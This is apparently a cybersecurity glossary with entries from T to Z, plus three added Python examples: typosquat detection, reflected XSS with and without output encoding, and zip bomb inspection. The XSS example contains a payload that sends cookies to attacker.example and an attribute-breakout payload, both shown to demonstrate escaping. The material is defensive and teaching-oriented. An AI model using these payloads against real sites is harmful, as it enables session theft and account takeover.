TCP/IP (Transmission Control Protocol and Internet Protocol) is a set of standardized rules that allow devices to connect and exchange data on a network (aka, it’s what powers the internet).
Text Bomb
A text bomb, also called an SMS bomb, is a malicious tactic where an attacker or automated system sends a massive number of unsolicited texts to a phone in rapid succession.
Threat Actor
A threat actor is any individual, group, or entity that intentionally carries out actions that could cause harm to digital systems, data, or networks. In cybersecurity, threat actors are responsible for orchestrating cyberattacks—for profit, espionage, disruption, or to push ideological agendas.
Threat Hunting
Threat hunting is the proactive search across telemetry for threats that have evaded existing security controls. It involves forming a hypothesis about likely attacker behavior and then analyzing system logs, network traffic, endpoint data, and other sources to confirm or rule it out.
Threat Intelligence
Threat intelligence is knowledge of what adversaries are doing and how they do it, turned into data an organization can act on to detect and disrupt them and to identify areas where defenders can gain an advantage over attackers.
Threat Intelligence Analyst
A threat intelligence analyst is a cybersecurity professional who collects, analyzes, and interprets raw data about current and emerging cyber threats.
Threat Intelligence Feed
A threat intelligence feed is a continuous stream of data about potential cyber threats. These feeds deliver up-to-the-minute data on known malicious activity to help organizations spot, share, and stay ahead of new and emerging attacks in real time.
TLS encryption
TLS (Transport Layer Security) encryption is a technology that secures data while it’s being transmitted online, ensuring it’s safe from eavesdropping or tampering. It’s the backbone of secure communication on the internet, protecting information like passwords, payment data, and emails.
Traitorware
Legitimate applications often abused by attackers, such as eM Client, PerfectData Software, and Newsletter Software Supermailer. These applications may appear harmless but can be exploited for malicious activities like phishing, data exfiltration, and financial fraud.
Transparency, Consent, & Control (TCC)
Transparency, Consent, and Control (TCC) is the macOS privacy framework, backed by a locally stored database, that restricts software from accessing sensitive user data and devices (such as the camera, microphone, contacts, and protected folders) until the user explicitly grants consent. Full Disk Access is one of the permissions it governs.
TrickBot
TrickBot originally emerged in 2016 as a banking trojan designed to steal financial credentials. Over time, it has evolved into a modular malware framework, widely used as a loader for ransomware and various criminal payloads. Cybercriminals quickly recognized TrickBot’s adaptability and capability, which made it a centerpiece in many malware-as-a-service (MaaS) operations.
Trojan Bitcoin Miner
A Trojan Bitcoin miner is a piece of malware that hijacks your computer’s resources to mine cryptocurrency without your knowledge or consent.
TTPs
TTPs, or Tactics, Techniques, and Procedures, refer to the methods attackers use to plan, execute, and achieve their objectives in a cyberattack.
Tunnel
In cybersecurity, a tunnel is a secure, encrypted connection that lets data be transmitted privately over an untrusted network.
Typosquatting
Typosquatting, also referred to as URL hijacking or domain spoofing, is a form of cyberattack where threat actors register slightly misspelled versions of legitimate domain names to trick users into visiting their malicious sites. These fake sites appear similar to the originals and often imitate the design and functionality of trusted brands.
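Defenders hunt for typosquats by generating the variants an attacker is likely to register (dropped, swapped, doubled or fat-fingered characters, and lookalike glyphs such as `rn` for `m`) and by measuring edit distance between newly seen domains and protected brand names. The following is an added example, not code from the original page; the brand labels `example` and `acme` and the sample domains are constructed, the QWERTY neighbour table is a partial one, and the registrable-label logic is deliberately naive (it does not consult a public-suffix list).

```python
# Added example: generate typosquat candidates for a brand label and score observed domains.
# Brand names, sample domains and the partial keyboard/homoglyph tables are constructed.
from typing import List, Optional, Set, Tuple

# Adjacent keys on a QWERTY layout (lowercase letters only; a deliberate subset).
KEYBOARD_NEIGHBOURS = {
    "a": "qwsz", "b": "vghn", "c": "xdfv", "d": "serfcx", "e": "wsdr", "f": "drtgvc",
    "g": "ftyhbv", "h": "gyujnb", "i": "ujko", "j": "huikmn", "k": "jiolm", "l": "kop",
    "m": "njk", "n": "bhjm", "o": "iklp", "p": "ol", "q": "wa", "r": "edft", "s": "awedxz",
    "t": "rfgy", "u": "yhji", "v": "cfgb", "w": "qase", "x": "zsdc", "y": "tghu", "z": "asx",
}
# (what appears in the brand, what an attacker substitutes)
HOMOGLYPHS = [("l", "1"), ("l", "i"), ("i", "l"), ("i", "1"), ("o", "0"),
              ("m", "rn"), ("rn", "m"), ("w", "vv"), ("vv", "w")]

def typo_variants(label: str) -> Set[str]:
    """Lookalike labels an attacker might register for `label` (the part before the TLD)."""
    variants = set()
    for i in range(len(label)):
        variants.add(label[:i] + label[i + 1:])                              # omission
        if i + 1 < len(label):
            variants.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])  # transposition
        variants.add(label[:i] + label[i] * 2 + label[i + 1:])               # doubled character
        for n in KEYBOARD_NEIGHBOURS.get(label[i], ""):
            variants.add(label[:i] + n + label[i + 1:])                      # adjacent-key hit
    for src, dst in HOMOGLYPHS:
        if src in label:
            variants.add(label.replace(src, dst, 1))                         # visual lookalike
    variants.discard(label)
    return variants

def levenshtein(a: str, b: str) -> int:
    """Minimum number of single-character edits turning `a` into `b`."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def registrable_label(domain: str) -> str:
    """Second-level label, ignoring the TLD and any subdomains. Naive: no public-suffix list."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def check_domain(domain: str, brands: List[str], max_distance: int = 1) -> Optional[Tuple[str, str]]:
    """Return (brand, reason) if `domain` looks like a typosquat of a protected brand, else None."""
    label = registrable_label(domain)
    for brand in brands:
        if label == brand:
            return None                                   # the brand's own label
        if label in typo_variants(brand):
            return (brand, "known typo pattern")
        distance = levenshtein(label, brand)
        if distance <= max_distance:
            return (brand, "edit distance %d" % distance)
    return None

if __name__ == "__main__":
    brands = ["example", "acme"]
    for d in ["exampel.com", "examp1e.net", "login.exmaple.com", "example.com", "unrelated.org"]:
        print(d, "->", check_domain(d, brands))
```

Candidate generation is what you would feed into passive-DNS or certificate-transparency monitoring to catch a squat at registration time; the edit-distance check is the fallback for variants the generator did not anticipate. Neither catches a TLD swap such as `example.co`, which needs a separate rule.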
U
UEFI
Unified Extensible Firmware Interface (UEFI) is a modern replacement for the legacy BIOS (Basic Input/Output System) that handles the critical first steps of your computer's boot process.
Unauthorized Access
Unauthorized or unwanted access occurs when a person or entity connects to or uses a system without permission, typically in order to perform malicious actions.
Unified Audit
Unified Audit refers to the process of consolidating audit logs from different sources into a single system for centralized monitoring, analysis, and reporting. This approach is integral in cybersecurity, allowing organizations to improve their visibility over user activities and system security across various platforms.
URL Spoofing
URL spoofing is a tactic used by attackers to trick you into thinking a fake website or link is legitimate. It often involves creating a lookalike URL designed to steal personal data or spread malware.
User Agent
A user agent is software, most commonly a web browser, that acts on your behalf to communicate with websites. It usually identifies itself through the User-Agent HTTP header (product, version, operating system); because that value is supplied by the client and trivially spoofed, it should never be relied on as a security control.
User and Entity Behavior Analytics (UEBA)
UEBA is a cybersecurity solution that uses algorithms and machine learning to detect anomalies in the behavior of users as well as routers, servers and endpoints in a network.
V
Virtual Local Area Network
A Virtual Local Area Network (VLAN) is a virtual partitioning of one physical network into multiple logical networks.
Virtual Machines (VM)
A virtual machine is a software-defined computer that runs its own operating system and applications in an isolated environment on top of a hypervisor, typically sharing a physical server with other VMs.
Virtual Private Network (VPN)
A VPN, or Virtual Private Network, is a service that creates a secure, encrypted connection between your device and the internet. It helps protect your online activity from prying eyes, ensuring your information stays private.
Virus
A computer virus is malicious software crafted to replicate, spread, and cause harm, such as slowing down devices, corrupting files, or stealing sensitive data.
Vishing
Vishing is short for voice phishing and involves fraudulent phone calls that trick a victim into giving sensitive data like login credentials, credit card numbers, or bank details.
VoIP
A VoIP network is a system that uses the internet to transmit voice calls and related communications, rather than traditional phone lines. VoIP stands for Voice over Internet Protocol, which means voice data is sent and received using Internet protocols.
Vulnerability
A vulnerability is a weakness in software or hardware that can be exploited by malicious actors. Examples include a flaw in software, a misconfiguration, or a human error.
W
Watering Hole Attack
A watering hole attack is a cyberattack where hackers compromise a legitimate and trusted website frequently visited by the intended target audience. The goal is to infect specific individuals or organizations with malware or gain unauthorized access to their networks.
Weaponization
In cybersecurity, weaponization is the stage of an attack in which otherwise harmless tools or documents are turned into vehicles for malicious code, for example by pairing an exploit with a payload inside a document or installer that will then be delivered to the target.
Web Application Firewall (WAF)
Web Application Firewall (WAF) is a tool that helps protect web-based applications, mobile apps, and APIs from cyber attacks by filtering and monitoring HTTP traffic between them and the Internet.
Web Server
A web server is a computer system or software that hosts websites and delivers web pages to users when requested. Think of it as the engine that powers the internet, making sure you can access your favorite cat videos, online shopping carts, or even this very article.
Website defacement
Website defacement is when someone gains unauthorized access to your website and swaps your pages or messages with their own. It’s digital graffiti, but the stakes are much higher for your business, reputation, and trust.
Website Logging
Website Logging is the systematic process of recording events and activities on a web server to help administrators monitor performance, troubleshoot issues, and detect security breaches.
White Team
A white team in cybersecurity serves as the oversight and coordination unit that ensures security testing activities remain ethical, legal, and aligned with organizational policies. They act as neutral referees who manage, document, and facilitate communication between various cybersecurity teams during security assessments and exercises.
X
XSS (Cross-Site Scripting)
XSS (cross-site scripting) is a code injection attack in which an attacker gets malicious script into pages served by a legitimate website, so that it runs in victims' browsers with that site's privileges. It comes in reflected, stored, and DOM-based variants; the core defense is context-aware output encoding of untrusted data, with a Content Security Policy as a second layer.
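The added example below (not code from the original page) shows the reflected case on the server side: the same attacker-controlled string rendered into an HTML body and into an attribute, once by raw concatenation and once through Python's `html.escape`. The payloads and the tiny templates are constructed; the stdlib `HTMLParser` is used only to check, the way a browser would, whether the injected text became a real tag or attribute.

```python
# Added example: vulnerable vs. hardened rendering of untrusted input, checked with a parser.
# Templates and payloads are constructed for the demonstration; not from the original page.
import html
from html.parser import HTMLParser
from typing import Dict

BODY_PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)'     # closes the value="" attribute, adds a handler

def render_vulnerable(query: str) -> str:
    """Reflected XSS: untrusted input concatenated straight into HTML text content."""
    return "<p>Results for: " + query + "</p>"

def render_hardened(query: str) -> str:
    """Output encoding for the HTML text context."""
    return "<p>Results for: " + html.escape(query) + "</p>"

def render_attribute_vulnerable(value: str) -> str:
    """Attribute context: no angle brackets needed, a single quote character breaks out."""
    return '<input name="q" value="' + value + '">'

def render_attribute_hardened(value: str) -> str:
    """quote=True also encodes \" and ' so the value can never terminate the attribute."""
    return '<input name="q" value="' + html.escape(value, quote=True) + '">'

class _Inspector(HTMLParser):
    """Records what a browser-like parser actually sees: script tags and <input> attributes."""
    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.input_attrs: Dict[str, str] = {}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        if tag == "input":
            self.input_attrs = {k: (v if v is not None else "") for k, v in attrs}

def _inspect(markup: str) -> _Inspector:
    p = _Inspector()
    p.feed(markup)
    p.close()
    return p

def script_tags(markup: str) -> int:
    """Number of real <script> elements in the markup (escaped text does not count)."""
    return _inspect(markup).script_tags

def input_attributes(markup: str) -> Dict[str, str]:
    """Attributes of the <input> element after parsing (entities are decoded)."""
    return _inspect(markup).input_attrs

if __name__ == "__main__":
    print(script_tags(render_vulnerable(BODY_PAYLOAD)), "script tag(s) in vulnerable body")
    print(script_tags(render_hardened(BODY_PAYLOAD)), "script tag(s) in hardened body")
    print(input_attributes(render_attribute_vulnerable(ATTR_PAYLOAD)))
    print(input_attributes(render_attribute_hardened(ATTR_PAYLOAD)))
```

In the hardened attribute case the parser still recovers the original string as the value of `value`, which is the point: encoding preserves the data while removing its ability to change the document's structure. Escaping is context-specific, so text placed inside a `<script>` block, a URL, or inline CSS needs a different encoder, and a templating engine with auto-escaping should do this by default rather than relying on every call site remembering to.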
Y
YARA Rules
YARA rules define patterns using a specialized rule-writing language. When a file or process is analyzed, YARA compares it against these rules. If the file or process matches the criteria defined in a rule, it's flagged as potentially malicious.
Z
Zero Trust Architecture
A Zero Trust Architecture refers to the way network devices and services are structured to enable a Zero Trust security model.
Zero Trust Network Access (ZTNA)
ZTNA is an IT technology solution that requires all users to be authenticated, authorized, and continuously validated for security configuration and posture before being granted or keeping access to applications and data.
Zero Trust Security
Zero Trust is a security model that grants no implicit trust based on network location or device ownership: every user and device must be authenticated and authorized, and that decision is continuously re-evaluated, before and while access to applications and data is granted.
Zero-Day Vulnerabilities
Zero-day vulnerabilities are security flaws that are unknown to, or not yet patched by, the software vendor and that attackers exploit before a fix is available. The "zero" refers to the number of days the vendor has had to address the flaw.
Zeus trojan
The Zeus trojan (also called Zbot) is a form of malware used by cybercriminals to steal sensitive information, mostly online banking credentials. It silently infects a computer, logs your keystrokes, and sends your private data back to attackers without you knowing.
Zip Bomb
A zip bomb, also known as a “decompression bomb” or “zip of death,” is a type of malicious archive file designed to overwhelm a system’s resources when decompressed. Unlike most malware, which corrupts or steals data, zip bombs create chaos by exhausting a system’s CPU, RAM, and storage capacity.
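The defensive move is to read the archive's central directory before inflating anything and to cap what is actually written out, because the declared sizes in the headers can themselves be lies. The following is an added example, not code from the original page: it constructs a highly compressible archive in memory (zero-filled members, a stand-in for a real bomb) and an incompressible benign one, then applies size, ratio, member-count and nesting checks followed by a capped streaming extraction. The thresholds are assumptions to tune per environment.

```python
# Added example: inspect a zip's declared sizes before extracting, and cap extraction.
# Both test archives are constructed in memory; thresholds are illustrative assumptions.
import io
import os
import zipfile

def build_suspicious_zip(member_size_mb: int = 8, members: int = 4) -> bytes:
    """Constructed fixture: a few zero-filled members that deflate to a fraction of a percent."""
    buf = io.BytesIO()
    chunk = b"\0" * (1024 * 1024)
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        for i in range(members):
            with zf.open("zeros_%d.bin" % i, "w") as member:
                for _ in range(member_size_mb):
                    member.write(chunk)
    return buf.getvalue()

def build_benign_zip() -> bytes:
    """Constructed fixture: one member of random bytes, which does not compress at all."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("report.bin", os.urandom(200_000))
    return buf.getvalue()

def inspect_zip(data: bytes, max_total_bytes: int, max_ratio: float, max_members: int) -> dict:
    """Read the central directory only (no inflation) and return a verdict with reasons."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    total_uncompressed = sum(i.file_size for i in infos)
    total_compressed = sum(i.compress_size for i in infos) or 1
    ratio = total_uncompressed / total_compressed
    reasons = []
    if len(infos) > max_members:
        reasons.append("too many members: %d" % len(infos))
    if total_uncompressed > max_total_bytes:
        reasons.append("declared size %d exceeds limit %d" % (total_uncompressed, max_total_bytes))
    if ratio > max_ratio:
        reasons.append("compression ratio %.0f:1 exceeds %.0f:1" % (ratio, max_ratio))
    nested = [i.filename for i in infos if i.filename.lower().endswith(".zip")]
    if nested:
        reasons.append("nested archives: %s" % ", ".join(nested))   # layered bombs hide here
    return {"members": len(infos), "declared_bytes": total_uncompressed,
            "ratio": ratio, "safe": not reasons, "reasons": reasons}

def safe_extract_member(data: bytes, name: str, limit: int) -> bytes:
    """Inflate in chunks and abort at `limit` bytes: headers can lie, so count what comes out."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as f:
        out = bytearray()
        while True:
            chunk = f.read(65536)
            if not chunk:
                return bytes(out)
            out += chunk
            if len(out) > limit:
                raise ValueError("member %s exceeded %d bytes while inflating" % (name, limit))

def extraction_is_capped(data: bytes, name: str, limit: int) -> bool:
    """True if safe_extract_member refused to inflate `name` past `limit`."""
    try:
        safe_extract_member(data, name, limit)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    limits = dict(max_total_bytes=16 * 1024 * 1024, max_ratio=100, max_members=1000)
    print(inspect_zip(build_suspicious_zip(), **limits))
    print(inspect_zip(build_benign_zip(), **limits))
    print("capped:", extraction_is_capped(build_suspicious_zip(), "zeros_0.bin", 1024 * 1024))
```

Deflate tops out near 1032:1, so a ratio check alone is a strong signal for single-layer bombs; nested archives and the newer overlapping-entry constructions defeat it, which is why the per-member output cap is the control that actually bounds resource use.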
Zombie Botnet
A zombie botnet is a network of internet-connected devices, such as computers, smartphones, or IoT devices, that have been infected with malware and are secretly controlled by an attacker, typically to send spam, launch DDoS attacks, or distribute further malware.